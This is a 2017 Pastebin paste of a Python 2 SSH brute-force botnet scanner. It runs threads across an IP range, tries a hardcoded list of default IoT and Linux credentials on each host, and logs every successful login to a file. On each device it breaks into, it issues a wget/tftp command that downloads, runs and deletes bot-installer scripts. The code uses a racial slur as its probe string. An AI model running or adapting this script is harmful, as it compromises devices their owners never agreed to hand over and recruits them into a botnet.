Advertisement
Guest User

Untitled

a guest
Nov 9th, 2017
91
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.90 KB | None | 0 0
  1. #!/usr/bin/env python
  2.  
  3. import threading, paramiko, random, socket, time, os, sys
  4.  
  5. if not os.geteuid()==0:
  6. sys.exit("\nGOTTA BE ROOT TO RIDE DA BANG BUS YA DIG\n")
  7.  
  8. os.system("clear")
  9. if len(sys.argv) < 3:
  10. print "BuSyBoX BaNG BuS v2 - Modded"
  11. print "Usage: python "+sys.argv[0]+" [Start IP] [End IP] [0/1/2/perl/ubnt]"
  12. sys.exit("Example: python "+sys.argv[0]+" 1.1.1.1 2.2.2.2 0\n")
  13.  
  14. sys.stdout.write("\x1b]2;BuSyBoX BaNG BuS\x07")
  15. os.system("clear")
  16. os.system("echo -e 'ulimit -s 999999; ulimit -n 999999; ulimit -u 999999\n' > ~/.bashrc")
  17. os.system("ulimit -s 999999; ulimit -n 999999; ulimit -u 999999")
  18. paramiko.util.log_to_file("/dev/null") #quiets paramiko output
  19. os.system("sysctl -w fs.file-max=999999 >/dev/null")
  20.  
  21. passwords = [ # argv 0
  22. "telnet:telnet"
  23. "admin:1234",
  24. "root:root",
  25. "ubnt:ubnt",
  26. "vagrant:vagrant",
  27. "pi:raspberry",
  28. "root:maxided",
  29. "root:123456",
  30. "root:Love2020",
  31. "root:Zero",
  32. "root:Password",
  33. "root:qwerty",
  34. "root:dragon",
  35. "root:pussy",
  36. "root:baseball",
  37. "root:football",
  38. "root:monkey",
  39. "root:696969",
  40. "root:abc123",
  41. "admin:admin",
  42. "admin:1234",
  43. "admin:Guest",
  44. "ubnt:ubnt",
  45. "guest:guest",
  46. "user:user",
  47. "test:test",
  48. "root:xc3511",
  49. "root:vizxv",
  50. "root:juantech",
  51. "root:default",
  52. "root:xmhdipc",
  53. "admin:smcadmin",
  54. "root:pass",
  55. "admin:password",
  56. "ubuntu:temppwd",
  57. ]
  58.  
  59. if sys.argv[3] == '1':
  60. passwords = [ "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test" ] #Slow but effective
  61. if sys.argv[3] == '2':
  62. passwords = [ "root:root", "admin:admin", "ubnt:ubnt" ] #faster with decent execution
  63. if sys.argv[3] == 'perl':
  64. passwords = [ "pi:raspberry", "vagrant:vagrant" ] #perl scanner
  65. if sys.argv[3] == 'ubnt':
  66. passwords = [ "ubnt:ubnt" ] #only ubnt
  67.  
  68. raw_input("Press <ENTER> to Enter the Bang Bus")
  69. credit = '# DO NOT SHARE THIS FUCKING SHIT' #throwback lulz
  70. print "\033[0m" + credit + "\033[0m"
  71.  
  72. def ipRange(start_ip, end_ip):
  73. start = list(map(int, start_ip.split(".")))
  74. end = list(map(int, end_ip.split(".")))
  75. temp = start
  76. ip_range = []
  77.  
  78. ip_range.append(start_ip)
  79. while temp != end:
  80. start[3] += 1
  81. for i in (3, 2, 1):
  82. if temp[i] == 256:
  83. temp[i] = 0
  84. temp[i-1] += 1
  85. ip_range.append(".".join(map(str, temp)))
  86.  
  87. return ip_range
  88. class sshscanner(threading.Thread): # TAG: 1A
  89. def __init__ (self, ip):
  90. threading.Thread.__init__(self)
  91. self.ip = str(ip)
  92. global passwords
  93. def run(self):
  94. x = 1
  95. while x != 0:
  96. try:
  97. username='root'
  98. password="0"
  99. port = 22
  100. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  101. s.settimeout(3)
  102. s.connect((self.ip, port))
  103. s.close()
  104. ssh = paramiko.SSHClient()
  105. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  106. dobreak=False
  107. for passwd in passwords:
  108. if ":n/a" in passwd:
  109. password=""
  110. else:
  111. password=passwd.split(":")[1]
  112. if "n/a:" in passwd:
  113. username=""
  114. else:
  115. username=passwd.split(":")[0]
  116. try:
  117. ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
  118. dobreak=True
  119. break
  120. except:
  121. pass
  122. if True == dobreak:
  123. break
  124. badserver=True
  125. stdin, stdout, stderr = ssh.exec_command("echo nigger")
  126. output = stdout.read()
  127. if "nigger" in output:
  128. badserver=False
  129. if badserver == False:
  130. os.system("echo -e " +self.ip+ " >> .bots.ips")
  131. os.system("echo " +username+ ":" +password+ ":" +self.ip+ " >> bots.txt")
  132. print "\033[32mBuSyBoXiNG -> " +username+ ":" +password+ ":" +self.ip+ "\033[0m"
  133. ssh.exec_command("cd /tmp; wget http://127.0.0.1/wget.sh; chmod +x wget.sh; sh wget.sh; rm -rf wget.sh; tftp -r tftp2.sh -g 127.0.0.1; chmod +x tftp2.sh; sh tftp2.sh; rm -rf tftp2.sh; tftp 127.0.0.1 -c get tftp1.sh; chmod +x tftp1.sh; sh tftp1.sh; rm -rf tftp1.sh")
  134. time.sleep(3)
  135. ssh.close()
  136. if badserver == True:
  137. ssh.close()
  138. except:
  139. pass
  140. x = 0
  141. ip_range = ipRange("" +sys.argv[1], "" +sys.argv[2])
  142. for ip in ip_range:
  143. try:
  144. t = sshscanner(ip)
  145. t.start()
  146. except:
  147. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement